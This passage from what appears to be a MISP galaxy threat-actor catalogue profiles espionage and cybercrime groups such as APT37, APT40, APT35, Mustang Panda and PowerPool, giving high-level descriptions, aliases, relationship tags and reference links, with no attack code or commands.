Nexus Zeta is no stranger when it comes to implementing SOAP-related exploits. The threat actor has already been observed implementing two other known SOAP-related exploits, CVE-2014-8361 and CVE-2017-17215, in his Satori botnet project. A third SOAP exploit, a TR-069 bug, has also been observed previously in IoT botnets. This makes EDB 38722 the fourth SOAP-related exploit that has been discovered in the wild in IoT botnets.

The tag is: misp-galaxy:threat-actor="Nexus Zeta"

Table 11913. Table References

Links

https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7

APT37

APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea. In 2017, APT37 expanded its targeting beyond the Korean peninsula to include Japan, Vietnam and the Middle East, and to a wider range of industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities.

The tag is: misp-galaxy:threat-actor="APT37"

APT37 is also known as:

  • APT 37

  • Group 123

  • Group123

  • InkySquid

  • Operation Daybreak

  • Operation Erebus

  • Reaper Group

  • Reaper

  • Red Eyes

  • Ricochet Chollima

  • ScarCruft

  • Venus 121

  • ATK4

  • G0067

  • Moldy Pisces

APT37 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT37 - G0067" with estimative-language:likelihood-probability="likely"

  • linked-to: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="ScarCruft - APT-C-28" with estimative-language:likelihood-probability="likely"

Table 11914. Table References

Links

https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/

https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

https://twitter.com/mstoned7/status/966126706107953152

https://www.cfr.org/interactive/cyber-operations/apt-37

https://www.bleepingcomputer.com/news/security/report-ties-north-korean-attacks-to-new-malware-linked-by-word-macros/

https://unit42.paloaltonetworks.com/unit42-freemilk-highly-targeted-spear-phishing-campaign/

https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

https://attack.mitre.org/groups/G0067/

https://securelist.com/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/75082/

https://securelist.com/operation-daybreak/75100/

https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/

https://unit42.paloaltonetworks.com/atoms/moldypisces/

APT40

Leviathan is an espionage actor targeting organizations and high-value targets in defense and government. Active since at least 2014, this actor has long-standing interest in maritime industries, naval defense contractors, and associated research institutions in the United States and Western Europe.

The tag is: misp-galaxy:threat-actor="APT40"

APT40 is also known as:

  • TEMP.Periscope

  • TEMP.Jumper

  • Leviathan

  • BRONZE MOHAWK

  • GADOLINIUM

  • KRYPTONITE PANDA

  • G0065

  • ATK29

  • TA423

  • Red Ladon

  • ITG09

  • MUDCARP

  • ISLANDDREAMS

  • Gingham Typhoon

APT40 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Leviathan - G0065" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="GADOLINIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Gingham Typhoon" with estimative-language:likelihood-probability="likely"

Table 11915. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

https://www.cfr.org/interactive/cyber-operations/apt-40

https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html

https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/

https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html

https://attack.mitre.org/groups/G0065/

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://intrusiontruth.wordpress.com/2020/01/09/what-is-the-hainan-xiandun-technology-development-company

https://intrusiontruth.wordpress.com/2020/01/10/who-is-mr-gu

https://intrusiontruth.wordpress.com/2020/01/13/who-else-works-for-this-cover-company-network

https://intrusiontruth.wordpress.com/2020/01/14/who-is-mr-ding

https://intrusiontruth.wordpress.com/2020/01/15/hainan-xiandun-technology-company-is-apt40

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

https://www.mycert.org.my/portal/advisory?id=MA-774.022020

https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign

https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/

https://www.justice.gov/opa/pr/four-chinese-nationals-working-ministry-state-security-charged-global-computer-intrusion

https://www.justice.gov/opa/press-release/file/1412916/download

https://www.justice.gov/opa/press-release/file/1412921/download

https://us-cert.cisa.gov/ncas/alerts/aa21-200a

https://us-cert.cisa.gov/ncas/alerts/aa21-200b

https://www.canada.ca/en/global-affairs/news/2021/07/statement-on-chinas-cyber-campaigns.html

https://www.ncsc.gov.uk/news/uk-allies-hold-chinese-state-responsible-for-pervasive-pattern-of-hacking

https://www.gov.uk/government/news/uk-and-allies-hold-chinese-state-responsible-for-a-pervasive-pattern-of-hacking

https://www.rnz.co.nz/news/political/447239/government-points-finger-at-china-over-cyber-attacks

https://www.foreignminister.gov.au/minister/marise-payne/media-release/australia-joins-international-partners-attribution-malicious-cyber-activity-china

https://www.mofa.go.jp/press/danwa/press6e_000312.html

https://www.consilium.europa.eu/en/press/press-releases/2021/07/19/declaration-by-the-high-representative-on-behalf-of-the-eu-urging-china-to-take-action-against-malicious-cyber-activities-undertaken-from-its-territory

https://www.mandiant.com/resources/insights/apt-groups

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi

https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia

https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea

https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf

https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/

APT35

FireEye has identified APT35 operations dating back to 2014. APT35, also known as the Newscaster Team, is a threat group sponsored by the Iranian government that conducts long term, resource-intensive operations to collect strategic intelligence. APT35 typically targets U.S. and the Middle Eastern military, diplomatic and government personnel, organizations in the media, energy and defense industrial base (DIB), and engineering, business services and telecommunications sectors.

The tag is: misp-galaxy:threat-actor="APT35"

APT35 is also known as:

  • Newscaster Team

  • Magic Hound

  • G0059

  • Phosphorus

  • Mint Sandstorm

  • TunnelVision

  • COBALT MIRAGE

APT35 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Mint Sandstorm" with estimative-language:likelihood-probability="likely"

Table 11916. Table References

Links

https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf

https://attack.mitre.org/groups/G0059/

https://www.cfr.org/interactive/cyber-operations/magic-hound

https://unit42.paloaltonetworks.com/unit42-magic-hound-campaign-attacks-saudi-targets/

https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html

https://www.cfr.org/cyber-operations/apt-35

https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/

https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/

https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/

https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/

https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us

Orangeworm

Symantec has identified a previously unknown group called Orangeworm that has been observed installing a custom backdoor called Trojan.Kwampirs within large international corporations that operate within the healthcare sector in the United States, Europe, and Asia. First identified in January 2015, Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims. Known victims include healthcare providers, pharmaceuticals, IT solution providers for healthcare and equipment manufacturers that serve the healthcare industry, likely for the purpose of corporate espionage.

The tag is: misp-galaxy:threat-actor="Orangeworm"

Table 11917. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

https://attack.mitre.org/groups/G0071/

ALLANITE

Adversaries abusing ICS (based on Dragos Inc adversary list). ALLANITE accesses business and industrial control (ICS) networks, conducts reconnaissance, and gathers intelligence in United States and United Kingdom electric utility sectors. Dragos assesses with moderate confidence that ALLANITE operators continue to maintain ICS network access to: (1) understand the operational environment necessary to develop disruptive capabilities, (2) have ready access from which to disrupt electric utilities. ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks, including collecting and distributing screenshots of industrial control systems. ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities. ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system.

The tag is: misp-galaxy:threat-actor="ALLANITE"

ALLANITE is also known as:

  • Palmetto Fusion

  • Allanite

ALLANITE has relationships with:

  • similar: misp-galaxy:mitre-ics-groups="ALLANITE" with estimative-language:likelihood-probability="almost-certain"

Table 11918. Table References

Links

https://dragos.com/adversaries.html

https://dragos.com/blog/20180510Allanite.html

CHRYSENE

Adversaries abusing ICS (based on Dragos Inc adversary list). This threat actor targets organizations involved in oil, gas, and electricity production, primarily in the Gulf region, for espionage purposes. According to one cybersecurity company, the threat actor “compromises a target machine and passes it off to another threat actor for further exploitation.”

The tag is: misp-galaxy:threat-actor="CHRYSENE"

CHRYSENE is also known as:

  • OilRig

  • Greenbug

CHRYSENE has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cutting Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="OilRig - G0049" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Greenbug" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Hazel Sandstorm" with estimative-language:likelihood-probability="likely"

Table 11919. Table References

Links

https://dragos.com/adversaries.html

https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf

https://www.cfr.org/interactive/cyber-operations/chrysene

ZooPark

ZooPark is a cyberespionage operation that has been focusing on Middle Eastern targets since at least June 2015. The threat actors behind ZooPark infect Android devices using several generations of malware we label from v1-v4, with v4 being the most recent version deployed in 2017.

The tag is: misp-galaxy:threat-actor="ZooPark"

Table 11920. Table References

Links

https://securelist.com/whos-who-in-the-zoo/85394/

RANCOR

The Rancor group’s attacks use two primary malware families, named DDKONG and PLAINTEE. DDKONG is used throughout the campaign, and PLAINTEE appears to be a new addition to these attackers’ toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to, Singapore and Cambodia.

The tag is: misp-galaxy:threat-actor="RANCOR"

RANCOR is also known as:

  • Rancor group

  • Rancor

  • Rancor Group

  • G0075

  • Rancor Taurus

Table 11921. Table References

Links

https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

https://www.cfr.org/interactive/cyber-operations/rancor

https://attack.mitre.org/groups/G0075/

https://unit42.paloaltonetworks.com/atoms/rancortaurus/

The Big Bang

While it is not clear exactly what the attacker is looking for, what is clear is that once he finds it, a second stage of the attack awaits, fetching additional modules and/or malware from the Command and Control server. This then is a surveillance attack in progress and has been dubbed ‘Big Bang’ due to the attacker’s fondness for the ‘Big Bang Theory’ TV show, after which some of the malware’s modules are named.

The tag is: misp-galaxy:threat-actor="The Big Bang"

Table 11922. Table References

Links

https://research.checkpoint.com/apt-attack-middle-east-big-bang/

https://blog.talosintelligence.com/2017/06/palestine-delphi.html

The Gorgon Group

Unit 42 researchers have been tracking Subaat, an attacker, since 2017. Recently Subaat drew our attention due to renewed targeted attack activity. Part of monitoring Subaat included realizing the actor was possibly part of a larger crew of individuals responsible for carrying out targeted attacks against worldwide governmental organizations. Technical analysis of some of the attacks, as well as attribution links with Pakistan actors, has already been described by 360 and Tuisec, who found interesting connections to a larger group of attackers Unit 42 researchers have been tracking, which we are calling Gorgon Group.

The tag is: misp-galaxy:threat-actor="The Gorgon Group"

The Gorgon Group is also known as:

  • Gorgon Group

  • Subaat

  • ATK92

  • G0078

  • Pasty Gemini

Table 11923. Table References

Links

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://unit42.paloaltonetworks.com/unit42-tracking-subaat-targeted-phishing-attacks-point-leader-threat-actors-repository/

https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/

https://attack.mitre.org/groups/G0078/

https://unit42.paloaltonetworks.com/atoms/pastygemini/

DarkHydrus

In July 2018, Unit 42 analyzed a targeted attack using a novel file type against at least one government agency in the Middle East. It was carried out by a previously unpublished threat group we track as DarkHydrus. Based on our telemetry, we were able to uncover additional artifacts leading us to believe this adversary group has been in operation with their current playbook since early 2016. This attack diverged from previous attacks we observed from this group as it involved spear-phishing emails sent to targeted organizations with password protected RAR archive attachments that contained malicious Excel Web Query files (.iqy).

The tag is: misp-galaxy:threat-actor="DarkHydrus"

DarkHydrus is also known as:

  • LazyMeerkat

  • G0079

  • Obscure Serpens

Table 11924. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/

https://mobile.twitter.com/360TIC/status/1083289987339042817

https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/

https://unit42.paloaltonetworks.com/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/

https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/

https://attack.mitre.org/groups/G0079/

https://unit42.paloaltonetworks.com/atoms/obscureserpens/

RedAlpha

Recorded Future’s Insikt Group has identified two new cyberespionage campaigns targeting the Tibetan Community over the past two years. The campaigns, which we are collectively naming RedAlpha, combine light reconnaissance, selective targeting, and diverse malicious tooling. We discovered this activity as the result of pivoting off of a new malware sample observed targeting the Tibetan community based in India.

The tag is: misp-galaxy:threat-actor="RedAlpha"

RedAlpha is also known as:

  • DeepCliff

  • Red Dev 3

Table 11925. Table References

Links

https://www.recordedfuture.com/chinese-cyberespionage-operations

https://go.recordedfuture.com/hubfs/reports/cta-2018-0626.pdf

https://go.recordedfuture.com/hubfs/reports/ta-2022-0816.pdf

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

TempTick

This threat actor targets organizations in the finance, defense, aerospace, technology, health-care, and automotive sectors and media organizations in East Asia for the purpose of espionage. It is believed to be responsible for the targeting of South Korean actors prior to the meeting of Donald J. Trump and Kim Jong-un.

The tag is: misp-galaxy:threat-actor="TempTick"

Table 11926. Table References

Links

https://www.cfr.org/interactive/cyber-operations/temptick

Operation Parliament

This threat actor uses spear-phishing techniques to target parliaments, government ministries, academics, and media organizations, primarily in the Middle East, for the purpose of espionage. Based on our findings, we believe the attackers represent a previously unknown geopolitically motivated threat actor. The campaign started in 2017, with the attackers doing just enough to achieve their goals. They most likely have access to additional tools when needed and appear to have access to an elaborate database of contacts in sensitive organizations and personnel worldwide, especially of vulnerable and non-trained staff. The victim systems range from personal desktop or laptop systems to large servers with domain controller roles or similar. The nature of the targeted ministries varied, including those responsible for telecommunications, health, energy, justice, finance and so on. Operation Parliament appears to be another symptom of escalating tensions in the Middle East region. The attackers have taken great care to stay under the radar, imitating another attack group in the region. They have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their command and control servers. The targeting seems to have slowed down since the beginning of 2018, probably winding down when the desired data or access was obtained. The targeting of specific victims is unlike previously seen behavior in regional campaigns by Gaza Cybergang or Desert Falcons and points to an elaborate information-gathering exercise that was carried out before the attacks (physical and/or digital). With deception and false flags increasingly being employed by threat actors, attribution is a hard and complicated task that requires solid evidence, especially in complex regions such as the Middle East.

The tag is: misp-galaxy:threat-actor="Operation Parliament"

Table 11927. Table References

Links

https://www.cfr.org/interactive/cyber-operations/operation-parliament

https://securelist.com/operation-parliament-who-is-doing-what/85237/

https://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html

Inception Framework

This threat actor uses spear-phishing techniques to target private-sector energy, defense, aerospace, research, and media organizations and embassies in Africa, Europe, and the Middle East, for the purpose of espionage.

The tag is: misp-galaxy:threat-actor="Inception Framework"

Inception Framework is also known as:

  • Clean Ursa

  • Cloud Atlas

  • OXYGEN

  • G0100

  • ATK116

  • Blue Odin

Table 11928. Table References

Links

https://www.cfr.org/interactive/cyber-operations/inception-framework

https://web.archive.org/web/20160710180729/https://www.bluecoat.com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-inception-framework%E2%80%9D-very-sophisticated-layered-malware

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Inception_APT_Analysis_Bluecoat.pdf

https://logrhythm.com/blog/catching-the-inception-framework-phishing-attack

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/bcs_wp_InceptionReport_EN_v12914.pdf

https://securelist.com/the-red-october-campaign/57647

https://securelist.com/red-october-diplomatic-cyber-attacks-investigation/36740

https://securelist.com/red-october-part-two-the-modules/57645

https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083

https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899

https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability

https://securelist.com/recent-cloud-atlas-activity/92016

https://www.symantec.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies

https://www.akamai.com/uk/en/multimedia/documents/white-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://unit42.paloaltonetworks.com/atoms/clean-ursa

https://www.cfr.org/interactive/cyber-operations/cloud-atlas

https://www.cfr.org/cyber-operations/red-october

https://attack.mitre.org/groups/G0100

HenBox

This threat actor targets Uighurs—a minority ethnic group located primarily in northwestern China—and devices from Chinese mobile phone manufacturer Xiaomi, for espionage purposes.

The tag is: misp-galaxy:threat-actor="HenBox"

Table 11929. Table References

Links

https://www.cfr.org/interactive/cyber-operations/henbox

MUSTANG PANDA

This threat actor targets nongovernmental organizations using Mongolian-themed lures for espionage purposes. In April 2017, CrowdStrike Falcon Intelligence observed a previously unattributed actor group with a Chinese nexus targeting a U.S.-based think tank. Further analysis revealed a wider campaign with unique tactics, techniques, and procedures (TTPs). This adversary targets non-governmental organizations (NGOs) in general, but uses Mongolian language decoys and themes, suggesting this actor has a specific focus on gathering intelligence on Mongolia. These campaigns involve the use of shared malware like Poison Ivy or PlugX. Recently, Falcon Intelligence observed new activity from MUSTANG PANDA, using a unique infection chain to target likely Mongolia-based victims. This newly observed activity uses a series of redirections and fileless, malicious implementations of legitimate tools to gain access to the targeted systems. Additionally, MUSTANG PANDA actors reused previously-observed legitimate domains to host files.

The tag is: misp-galaxy:threat-actor="MUSTANG PANDA"

MUSTANG PANDA is also known as:

  • BRONZE PRESIDENT

  • HoneyMyte

  • Red Lich

  • TEMP.HEX

  • BASIN

  • Earth Preta

  • TA416

  • Stately Taurus

  • LuminousMoth

Table 11930. Table References

Links

https://www.cfr.org/interactive/cyber-operations/mustang-panda

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.secureworks.com/research/threat-profiles/bronze-president

https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html

https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader

https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european

https://unit42.paloaltonetworks.com/stately-taurus-targets-philippines-government-cyberespionage/

Thrip

This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.

The tag is: misp-galaxy:threat-actor="Thrip"

Thrip is also known as:

  • G0076

  • ATK78

Table 11931. Table References

Links

https://www.cfr.org/interactive/cyber-operations/thrip

https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

https://attack.mitre.org/groups/G0076/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://cyberthreat.thalesgroup.com/sites/default/files/2022-05/THALES%20THREAT%20HANDBOOK%202022%20Light%20Version_1.pdf

Stealth Mango and Tangelo

This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.

The tag is: misp-galaxy:threat-actor=" Stealth Mango and Tangelo "

Table 11932. Table References

Links

https://www.cfr.org/interactive/cyber-operations/stealth-mango-and-tangelo

https://www.lookout.com/blog/stealth-mango

PowerPool

Malware developers have started to use the zero-day exploit for Task Scheduler component in Windows, two days after proof-of-concept code for the vulnerability appeared online.

A security researcher who uses the online name SandboxEscaper on August 27 released the source code for exploiting a security bug in the Advanced Local Procedure Call (ALPC) interface used by Windows Task Scheduler.

More specifically, the problem is with the SchRpcSetSecurity API function, which fails to properly check the user’s permissions, allowing write privileges on files in C:\Windows\Task.

The vulnerability affects Windows versions 7 through 10 and can be used by an attacker to escalate their privileges to all-access SYSTEM account level.

A couple of days after the exploit code became available (source and binary), malware researchers at ESET noticed its use in active malicious campaigns from a threat actor they call PowerPool, because of their tendency to use tools mostly written in PowerShell for lateral movement.

The group appears to have a small number of victims in the following countries: Chile, Germany, India, the Philippines, Poland, Russia, the United Kingdom, the United States, and Ukraine.

The researchers say that PowerPool developers did not use the binary version of the exploit, deciding instead to make some subtle changes to the source code before recompiling it.

The tag is: misp-galaxy:threat-actor="PowerPool"

PowerPool is also known as:

  • IAmTheKing

Table 11933. Table References

Links

https://www.bleepingcomputer.com/news/security/windows-task-scheduler-zero-day-exploited-by-malware/

https://twitter.com/craiu/status/1311920398259367942

Bahamut

Bahamut is a threat actor primarily operating in the Middle East and Central Asia, suspected to be a private contractor to several state-sponsored actors. They were observed conducting phishing as well as desktop and mobile malware campaigns.

The tag is: misp-galaxy:threat-actor="Bahamut"

Table 11934. Table References

Links

https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/

https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/

Iron Group

Iron Group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for Windows, Linux and Android platforms. They have used their malware to successfully infect at least a few thousand victims.

The tag is: misp-galaxy:threat-actor="Iron Group"

Iron Group is also known as:

  • Iron Cyber Group

Table 11935. Table References

Links

https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/

Operation BugDrop

This threat actor targets critical infrastructure entities in the oil and gas sector, primarily in Ukraine. The threat actors deploy the BugDrop malware to remotely access the microphones in their targets' computers to eavesdrop on conversations.

The tag is: misp-galaxy:threat-actor="Operation BugDrop"

Table 11936. Table References

Links

https://www.cfr.org/interactive/cyber-operations/operation-bugdrop

Unnamed Actor

This threat actor compromises civil society groups the Chinese Communist Party views as hostile to its interests, such as Tibetan, Uyghur, Hong Kong, and Taiwanese activists. The threat actor also targeted the Myanmar electoral commission.

The tag is: misp-galaxy:threat-actor="Unnamed Actor"

Table 11937. Table References

Links

https://www.cfr.org/interactive/cyber-operations/unnamed-actor

Domestic Kitten

An extensive surveillance operation targets specific groups of individuals with malicious mobile apps that collect sensitive information on the device along with surrounding voice recordings. Researchers with CheckPoint discovered the attack and named it Domestic Kitten. The targets are Kurdish and Turkish natives, and ISIS supporters, all Iranian citizens.

The tag is: misp-galaxy:threat-actor="Domestic Kitten"

Domestic Kitten is also known as:

  • Bouncing Golf

  • APT-C-50

Table 11939. Table References

Links

https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/

https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html

https://www.welivesecurity.com/2022/10/20/domestic-kitten-campaign-spying-iranian-citizens-furball-malware/

https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/

FASTCash

Treasury has identified a sophisticated cyber-enabled ATM cash out campaign we are calling FASTCash. FASTCash has been active since late 2016 targeting banks in Africa and Asia to remotely compromise payment switch application servers within banks to facilitate fraudulent transactions, primarily involving ATMs, to steal cash equivalent to tens of millions of dollars. FBI has attributed malware used in this campaign to the North Korean government. We expect FASTCash to continue targeting retail payment systems vulnerable to remote exploitation.

The tag is: misp-galaxy:threat-actor="FASTCash"

Roaming Mantis

According to new research by Kaspersky’s GReAT team, the online criminal activities of the Roaming Mantis Group have continued to evolve since they were first discovered in April 2018. As part of their activities, this group hacks into exploitable routers and changes their DNS configuration. This allows the attackers to redirect the router user’s traffic to malicious Android apps disguised as Facebook and Chrome or to Apple phishing pages that were used to steal Apple ID credentials. Recently, Kaspersky has discovered that this group is testing a new monetization scheme by redirecting iOS users to pages that contain the Coinhive in-browser mining script rather than the normal Apple phishing page. When users are redirected to these pages, they will be shown a blank page in the browser, but their CPU utilization will jump to 90% or higher.

The tag is: misp-galaxy:threat-actor="Roaming Mantis"

Roaming Mantis is also known as:

  • Roaming Mantis Group

Table 11940. Table References

Links

https://www.bleepingcomputer.com/news/security/roaming-mantis-group-testing-coinhive-miner-redirects-on-iphones/

GreyEnergy

ESET research reveals a successor to the infamous BlackEnergy APT group targeting critical infrastructure, quite possibly in preparation for damaging attacks.

The tag is: misp-galaxy:threat-actor="GreyEnergy"

GreyEnergy has relationships with:

  • similar: misp-galaxy:threat-actor="Sandworm" with estimative-language:likelihood-probability="likely"

Table 11941. Table References

Links

https://www.eset.com/int/greyenergy-exposed/

https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/

The Shadow Brokers

The Shadow Brokers (TSB) is a hacker group who first appeared in the summer of 2016. They published several leaks containing hacking tools from the National Security Agency (NSA), including several zero-day exploits. Specifically, these exploits and vulnerabilities targeted enterprise firewalls, antivirus software, and Microsoft products. The Shadow Brokers originally attributed the leaks to the Equation Group threat actor, who have been tied to the NSA’s Tailored Access Operations unit.

The tag is: misp-galaxy:threat-actor="The Shadow Brokers"

The Shadow Brokers is also known as:

  • The ShadowBrokers

  • TSB

  • Shadow Brokers

  • ShadowBrokers

Table 11942. Table References

Links

https://en.wikipedia.org/wiki/The_Shadow_Brokers

https://securelist.com/darkpulsar/88199/

https://musalbas.com/blog/2016/08/16/equation-group-firewall-operations-catalogue.html

https://www.vice.com/en_us/article/53djj3/shadow-brokers-whine-that-nobody-is-buying-their-hacked-nsa-files

https://www.scmagazineuk.com/second-shadow-brokers-dump-released/article/1476023

https://www.cyberscoop.com/nsa-shadow-brokers-leaks-iran-russia-optimusprime-stoicsurgeon/

https://www.csoonline.com/article/3190055/new-nsa-leak-may-expose-its-bank-spying-windows-exploits.html

https://threatpost.com/shadowbrokers-dump-more-equation-group-hacks-auction-file-password/124882/

http://securityaffairs.co/wordpress/62770/hacking/shadowbrokers-return.html

https://www.hackread.com/nsa-data-dump-shadowbrokers-expose-unitedrake-malware/

https://blacklakesecurity.com/who-was-the-nsa-contractor-arrested-for-leaking-the-shadow-brokers-hacking-tools/

EvilTraffic

Malware experts at CSE Cybsec uncovered a massive malvertising campaign dubbed EvilTraffic leveraging tens of thousands of compromised websites. Crooks exploited some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenue via advertising.

The tag is: misp-galaxy:threat-actor="EvilTraffic"

EvilTraffic is also known as:

  • Operation EvilTraffic

Table 11943. Table References

Links

http://securityaffairs.co/wordpress/68059/cyber-crime/eviltraffic-malvertising-campaign.html

https://cybaze.it/download/zlab/20180121_CSE_Massive_Malvertising_Report.pdf

HookAds

